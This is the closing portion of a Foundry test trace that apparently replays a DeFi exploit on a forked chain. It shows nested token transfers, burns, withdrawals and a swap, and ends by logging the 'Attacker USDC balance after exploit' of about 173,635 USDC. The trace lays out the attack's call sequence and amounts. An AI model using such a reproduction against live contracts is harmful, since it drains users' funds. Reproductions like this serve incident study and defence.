    │   │   │   │   │   │   │   │   ├─ [2973] 0x929EC64c34a17401F460460D4B9390518E5B473e::handleAction(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 185199020863484 [1.851e14], 383113790271 [3.831e11])
    │   │   │   │   │   │   │   │   │   ├─ [2319] 0xaad324f7e4Dd50C6b105820f8a877eE2DCBFA789::handleAction(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 185199020863484 [1.851e14], 383113790271 [3.831e11]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, to: 0x0000000000000000000000000000000000000000, value: 368503794025 [3.685e11])
    │   │   │   │   │   │   │   │   ├─ emit Burn(param0: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, param1: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, param2: 368503794025 [3.685e11], param3: 0, param4: 1014182544046923627575866516 [1.014e27])
    │   │   │   │   │   │   │   │   ├─ [24628] 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E::transfer(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 368503794025 [3.685e11])
    │   │   │   │   │   │   │   │   │   ├─ [23928] 0xa3fa3D254bf6aF295b5B22cC6730b04144314890::transfer(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 368503794025 [3.685e11]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x625E7708f30cA75bfd92586e17077590C60eb4cD, to: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, value: 368503794025 [3.685e11])
    │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   @ 0x37822bc9d1e42633e7a10b46af9482f8c36329728a2f80f4a9a3fca27d86e879: 0x00000000000000000000000000000000000000000000000000006763bc908179 → 0x0000000000000000000000000000000000000000000000000000670df006d810
    │   │   │   │   │   │   │   │   │   │   │   @ 0x48ab1c212394022d45677e5dab2bd184d75034a1eeb669ebe093cc603fe260e3: 0 → 0x00000000000000000000000000000000000000000000000000000055cc89a969
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0xc2e4d1d4d5cc5ac5f3c9d78db895f91f8e825342406c676d70f0cd57d2b69f5f: 0x000000000346e981e0ac3276197b7494000000000000000000000059335c833f → 0x000000000346e981e0ac3276197b749400000000000000000000000499fafb3e
    │   │   │   │   │   │   │   │   │   @ 54: 0x0000000000000000000000000000000000000000000000000000a87001d9effc → 0x0000000000000000000000000000000000000000000000000000a81b687867fb
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   │   ├─ emit Withdraw(param0: 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, param1: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, param2: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, param3: 368503794025 [3.685e11])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x48ab1c212394022d45677e5dab2bd184d75034a1eeb669ebe093cc603fe260e3: 0 → 0x00000000000000000000000000000000000000000000000000000055cc89a969
    │   │   │   │   │   │   │   @ 0x2889eaa22747c352a3ff649cf4e08b28f365682fd55aaed4ce267db314fb2e54: 0x0000000000052a817cd9758709303883000000000346e981e0ac3276197b7494 → 0x0000000000052fb4056245c12e0477a6000000000346e981e0ac3276197b7494
    │   │   │   │   │   │   │   @ 0x2889eaa22747c352a3ff649cf4e08b28f365682fd55aaed4ce267db314fb2e55: 0x00000000000e835b10c1d056839de4e900000000034e48d2eaf49e4bc9b17278 → 0x00000000000e8aa8ccddcd0f94e0424600000000034e48d2eaf49e4bc9b17278
    │   │   │   │   │   │   │   @ 0x2889eaa22747c352a3ff649cf4e08b28f365682fd55aaed4ce267db314fb2e56: 0x00000000000000000000020063a590af00000000002b2c54d07c40744273bc9d → 0x00000000000000000000020063a590af00000000002b2d3e87ffc00b649c0848
    │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000055cc89a969
    │   │   │   │   │   └─ ← [Return] 368503794025 [3.685e11]
    │   │   │   │   └─ ← [Return] 368503794025 [3.685e11]
    │   │   │   ├─ [24628] 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 368503794025 [3.685e11])
    │   │   │   │   ├─ [23928] 0xa3fa3D254bf6aF295b5B22cC6730b04144314890::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 368503794025 [3.685e11]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 368503794025 [3.685e11])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x00000000000000000000000000000000000000000000000000000055cc89a969
    │   │   │   │   │   │   @ 0x48ab1c212394022d45677e5dab2bd184d75034a1eeb669ebe093cc603fe260e3: 0x00000000000000000000000000000000000000000000000000000055cc89a969 → 0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ emit Withdraw(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 368503794025 [3.685e11], param3: 1844317480751 [1.844e12])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000000001ad69e3672f → 0
    │   │   │   │   @ 3: 0x000000000000000000000000000000000000000000000000000001decf9303fb → 0x0000000000000000000000000000000000000000000000000000003165af9ccc
    │   │   │   │   @ 0x48ab1c212394022d45677e5dab2bd184d75034a1eeb669ebe093cc603fe260e3: 0 → 0x00000000000000000000000000000000000000000000000000000055cc89a969
    │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000055cc89a969
    │   │   ├─ [4728] 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E::transfer(0xf4003F4efBE8691B60249E6afbD307aBE7758adb, 194867977364 [1.948e11])
    │   │   │   ├─ [4028] 0xa3fa3D254bf6aF295b5B22cC6730b04144314890::transfer(0xf4003F4efBE8691B60249E6afbD307aBE7758adb, 194867977364 [1.948e11]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xf4003F4efBE8691B60249E6afbD307aBE7758adb, value: 194867977364 [1.948e11])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x00000000000000000000000000000000000000000000000000000055cc89a969 → 0x000000000000000000000000000000000000000000000000000000286d804cd5
    │   │   │   │   │   @ 0x765b609ffdf136afe6a091ab2ab68a125caa0ddb309ecce362de4a07428aea9f: 0x00000000000000000000000000000000000000000000000000000287a3361751 → 0x000000000000000000000000000000000000000000000000000002b5023f73e5
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x00000000000000000000000000000000000000000000000000000055cc89a969
    │   │   └─ ← [Stop]
    │   ├─ [2491] 0xB31f66AA3C1e785363F0875A1B74E27b85FD66c7::balanceOf(0xf4003F4efBE8691B60249E6afbD307aBE7758adb) [staticcall]
    │   │   └─ ← [Return] 251849339333914359565739 [2.518e23]
    │   ├─ [1226] 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E::balanceOf(0xf4003F4efBE8691B60249E6afbD307aBE7758adb) [staticcall]
    │   │   ├─ [529] 0xa3fa3D254bf6aF295b5B22cC6730b04144314890::balanceOf(0xf4003F4efBE8691B60249E6afbD307aBE7758adb) [delegatecall]
    │   │   │   └─ ← [Return] 2976450048997 [2.976e12]
    │   │   └─ ← [Return] 2976450048997 [2.976e12]
    │   ├─ emit Sync(reserve0: 251849339333914359565739 [2.518e23], reserve1: 2976450048997 [2.976e12])
    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 0, amount1In: 194867977364 [1.948e11], amount0Out: 0, amount1Out: 194283372435 [1.942e11], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 8: 0x63a5902b000000000000000002b4df6716e4000000003554c7b0d9351b290dab → 0x63a590af000000000000000002b5023f73e5000000003554c7b0d9351b290dab
    │   │   @ 9: 0x000000000000000000000000000000000000005d1df50404ec164c5fcecb2029 → 0x000000000000000000000000000000000000005d1dfbb6f2d5bceed43c6b0b39
    │   │   @ 10: 0x00000000000000000000112019468f53d1e635251e6bf430fc30eeb084200773 → 0x000000000000000000001120236f913bd15e5eea3edaef6e728e0ef409393fe3
    │   └─ ← [Stop]
    ├─ [1226] 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [529] 0xa3fa3D254bf6aF295b5B22cC6730b04144314890::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 173635816661 [1.736e11]
    │   └─ ← [Return] 173635816661 [1.736e11]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDC balance after exploit", val: 173635816661 [1.736e11], decimals: 6)
    ├─  storage changes:
    │   @ 34: 0 → 0x0000000000000000000000000000000000000000000000000000002d3b089339
    │   @ 12: 0 → 1
    │   @ 35: 0 → 0x0000000000000000000000000000000000000000000000000000000001286c5a
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 24.36s (22.96s CPU time)

Ran 2 test suites in 25.46s (24.83s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
